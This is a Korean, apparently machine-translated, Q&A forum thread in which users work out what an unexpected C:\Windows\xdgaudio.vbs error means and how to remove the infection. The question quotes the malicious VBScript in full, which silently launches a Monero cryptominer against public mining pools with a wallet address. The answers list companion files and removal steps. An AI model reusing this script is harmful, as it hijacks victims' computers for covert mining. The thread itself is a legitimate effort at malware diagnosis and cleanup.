2. 질의 응답
  3. 오류 창을 해결하는 방법/xdgaudio.vbs

오류 창을 해결하는 방법/xdgaudio.vbs

2017-10-02 30 views
-2

Windows 스크립트 호스트 오류입니다.오류 창을 해결하는 방법/xdgaudio.vbs

C:\Windows\xdgaudio.vbs의 내용은 다음과 같습니다.

Dim WShell 
Set WShell = CreateObject("WScript.Shell") 
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0 
Set WShell = Nothing

나는 그림을 첨부하여 해결책을 알려주세요.

enter image description here

출처

2017-10-02 Helping Koushik

답변

3

그것을 알아 냈어! 짧은 대답 : Windows 디렉터리에서 "servicecrsssr.vbs"파일을 삭제 한 다음 다시 부팅하십시오. (프로그램을 종료하는 동안 문제가되는 파일을 다시 쓰려고 시도 할 가능성을 피하기 위해 파일 손실/손상 위험에도 불구하고 실제로 플러그를 뽑았습니다.)

다른 많은 파일이 관련되어 있지만 삭제시 (또는 이름을 변경) 위의 파일을 재부팅하고 모두 재부팅해도 ... 광업 프로세스가 실행되고 있다는 증거는 없습니다. 두 대의 테스트 컴퓨터에서이 바이러스를 발견했습니다. 이것들은 고객의 감염된 드라이브를 USB를 통해 연결 한 유일한 컴퓨터입니다. 이 일이 어떻게 전파되는지 정확히 알 수 있습니다! 참여 듯 다른 파일이 있었다 :

\Windows\winprs.bat 
\Windows\winvpr.vbs 
\Windows\winvprse.bat 
\Windows\xdgaudio.vbs 
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf

* 표시 .PF 파일이 "X"의 이름을 변경하거나 재부팅을 삭제하면 대신에 새로운 임의의 문자로 자신을 다시 작성 - 어떤 병에 효과 내가 결정할 수있는 처음 감염된 컴퓨터에서 위의 모든 파일의 이름을 변경하고 각각의 이름을 바꾼 다음 재부팅합니다. 마지막으로 시도한 파일은 "servicecrsssr.vbs"입니다. 두 번째 감염된 테스트 컴퓨터에서 "servicecrsssr.vbs"파일의 이름을 바꾸고 재부팅 한 다음 모든 것이 잘 수행되었습니다. 이것이 어떻게 효과가 있는지 알려주세요. 감사!

출처

2017-10-05 01:06:47 LREmery

+1

예, 문제가 해결되었지만 어떻게 이러한 공격을 피할 수 있습니까? 내 노트북에 1 달 동안 있었어. –

0

나는 답변을 갖고 싶다! 이 감염은 내가 일하고있는 내 고객의 랩톱 중 하나에서 발생했습니다. 그녀는 이미 Win8.1을 리셋했지만 하드 드라이브가 고장났다는 다른 팝업과 함께 여전히 거기에있었습니다 (그것은 아닙니다). 그래서 어쨌든, 나는 Win 파티션을 죽이고 다시 만들었으며 새로운 Win10을 던져 버렸습니다. 그러나 ... 내가 랩톱 컴퓨터의 하드 드라이브를 USB를 통해 테스트 컴퓨터 (예 : 지금)에 연결 한 동안 컴퓨터가 갑자기 "D : \ Windows \ xdgaudio.vbs"오류가 나타나기 시작했습니다. 몇 분마다. 파일을 실행하거나 문서 나 그림을 보지 않았습니다. 방금 Acronis True Image를 사용하여 외부 SSD로 드라이브를 백업 했으므로 모든 재미가 시작되었습니다. 나는 어둠 속에서 (처음 팝업이 시작되기 전에) 고객의 드라이브를 두 개의 다른 시스템에 연결했고 그들은 모두 팝업으로 끝났습니다. 해당 "servicecrsssr.vbs"파일을 삭제하여 추적없이 팝업을 중지했습니다.

"xdgaudio.vbs"파일에는 일종의 cryptocurrency 마이닝 프로그램 인 것처럼 보이는 "Cryptonight"가 있습니다. 이 프로그램이 내 테스트 PC를 좀비 전자 통화 광부로 만들려고 시도 했습니까 ?? 성공 했습니까 ?? 나는 아직 결정하지 않았다. 모든 시스템이이 침입의 영향을 완전히 피할 수 있기를 바랍니다. 어쩌면이 스크립팅 언어를 아는 사람이 여기에서 도움이 될 수 있습니다. 이 게시물은 "3 일 전에"(나를 위해 2017-10-02) 이후 324 회 이상의 조회수를 얻었으므로 우리는 혼자가 아닙니다.

출처

2017-10-05 20:33:44 LREmery

+0

도움이 될 수도 있습니다. http://www.investopedia.com/news/prevent-browser-hijacked-cryptocurrency-mining-cybersecurity/ – LREmery

0

실제로 비트 코 광부입니다. 고맙게도 상당히 공정한 것으로, 백그라운드 프로세스를 실행하는 것보다 더 명백하고 악의적 인 것은 아닙니다. 내가 실행하는 안티 바이러스/맬웨어 앱 중 어느 것도 선택하지 않았습니다. 내 파일은 설치 파일에 압축되어 다운로드 된 게임에서 발견되었습니다.

바이러스 백신 프로그램이이 파일을 쉽게 선택해야합니다. vbs 및 배치 파일은 매우 분명합니다. Malwarebytes는 결국 호출 한 실제 광부 .exe 파일에 대해 불만을 나타 냈지만 실행 한 후에 만 ​​불만을 나타 냈습니다.

출처

2017-11-17 13:06:17 dmiller423

 관련 문제

  • 관련 문제 없음^_^